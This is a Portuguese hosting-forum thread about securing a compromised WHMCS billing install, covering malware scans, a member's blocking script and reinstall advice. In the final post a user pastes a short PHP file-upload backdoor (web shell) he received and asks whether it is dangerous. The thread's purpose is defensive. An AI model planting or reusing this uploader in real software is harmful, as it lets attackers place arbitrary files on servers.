Jesmarcelo Postado Janeiro 7, 2012 Compartilhar Postado Janeiro 7, 2012 @megahost Recomendo passar o maldet no servidor procurando por virus e malware, com isso você irá identificar se ainda tem algo de errado no servidor. Link para o comentário Compartilhar em outros sites More sharing options...
Helcio Postado Janeiro 20, 2012 Compartilhar Postado Janeiro 20, 2012 (editado) Valeu Edvan, obrigado. Se tem alguem aqui que entende de como cuidar do WHMCS é você. Mas pera aí, se o Matt é o pai...........você é a mãe?????????? :D :blink: Brincadeirinha, você ó Tio! Foi só pra descontrair um pouco :rolleyes: , obrigado mesmo. Editado Janeiro 22, 2012 por Helcio - Complexo WEB Link para o comentário Compartilhar em outros sites More sharing options...
edvan Postado Janeiro 22, 2012 Compartilhar Postado Janeiro 22, 2012 Valeu Edvan, obrigado. Se tem alguem aqui que entende de como cuidar do WHMCS é você. Mas pera aí, se o Matt é o pai...........você á mãe?????????? :D :blink: Foi só pra descontrair um pouco :rolleyes: , obrigado mesmo. Tá doido é? Anda cheirando orégano? Edita isso! Não seria melhor tio? Link para o comentário Compartilhar em outros sites More sharing options...
luis_uendeo Postado Janeiro 22, 2012 Compartilhar Postado Janeiro 22, 2012 Tá doido é? Anda cheirando orégano? Edita isso! Não seria melhor tio? Deu chilique! KKK Link para o comentário Compartilhar em outros sites More sharing options...
Helcio Postado Janeiro 22, 2012 Compartilhar Postado Janeiro 22, 2012 Deu chilique! KKK kkkkkkk surto! Ta bom você é o Tiu! ______________________ Aproveitando.... Não sei se já passaram por isso, mas com o script funcionando (o que o EDVAN criou - xyz.php) eu sou sempre banido quando tento editar os templates de email. Como posso apagar o ban no banco de dados beleza, mas deu medo de algum cliente ser banido tipo por editar suas infos na area do cliente. Mas ainda estou usando, vamos ver o que dá. Link para o comentário Compartilhar em outros sites More sharing options...
Alexandre Duran Postado Janeiro 23, 2012 Compartilhar Postado Janeiro 23, 2012 Se eu fosse vc deletaria TODOS os arquivos em seu WHMCS, salvando antes o configuration.php e sua base de dados original. Reinstale tudo a partir da última versão e mude os dados (inclusive nome, usuário e senha) do banco de dados alterando-os em seu configuration.php original. Link para o comentário Compartilhar em outros sites More sharing options...
Clebson Postado Janeiro 27, 2012 Compartilhar Postado Janeiro 27, 2012 Usei a dica do Edvan, e quando estava navegando pelo meu Admin, recebi um block do nada.. Até 2080 :( Link para o comentário Compartilhar em outros sites More sharing options...
Helcio Postado Janeiro 27, 2012 Compartilhar Postado Janeiro 27, 2012 Usei a dica do Edvan, e quando estava navegando pelo meu Admin, recebi um block do nada.. Até 2080 :( Então amigo, acontece comigo, mas somente quando edito os templates de email. Basta remover seu ip da tabela TBLBANNEDIPS pelo PHPMyAdmin no banco de dados do seu WHMCS e volta tudo ao normal. Por via das dúvidas vou manter este script que ao meu ver é muito bom e de fato não recebi mais os "emails malditos" :ph34r: Valeu Tiu Edvan! Link para o comentário Compartilhar em outros sites More sharing options...
Clebson Postado Janeiro 27, 2012 Compartilhar Postado Janeiro 27, 2012 Sim, eu já removi o IP. Exatamente, somente quando edita os templates de e-mails. Link para o comentário Compartilhar em outros sites More sharing options...
Lperez Postado Fevereiro 1, 2012 Compartilhar Postado Fevereiro 1, 2012 Recebi um codigo diferente hoje, e passou batido pelo arquivo criado no includes/hooks/ <?php echo '<form action=" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; } else { echo '<b>Upload GAGAL !!!</b><br><br>'; } } ?> ) Será que corro algum risco? Estou usando a versão 5.03 do WHMCS Valeu! Link para o comentário Compartilhar em outros sites More sharing options...
Posts Recomendados